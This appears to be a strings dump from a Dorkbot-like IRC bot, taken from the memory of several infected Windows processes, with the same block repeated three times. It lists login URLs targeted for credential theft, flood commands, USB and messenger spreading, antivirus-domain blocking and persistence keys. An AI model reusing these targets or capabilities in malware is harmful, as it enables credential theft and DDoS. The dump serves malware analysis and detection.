*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

svchost.exe_1184_rwx_00C40000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\svchost.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

spoolsv.exe_1432_rwx_00DD0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\spoolsv.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

wmiprvse.exe_1928_rwx_00DE0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%System%\wbem\wmiprvse.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
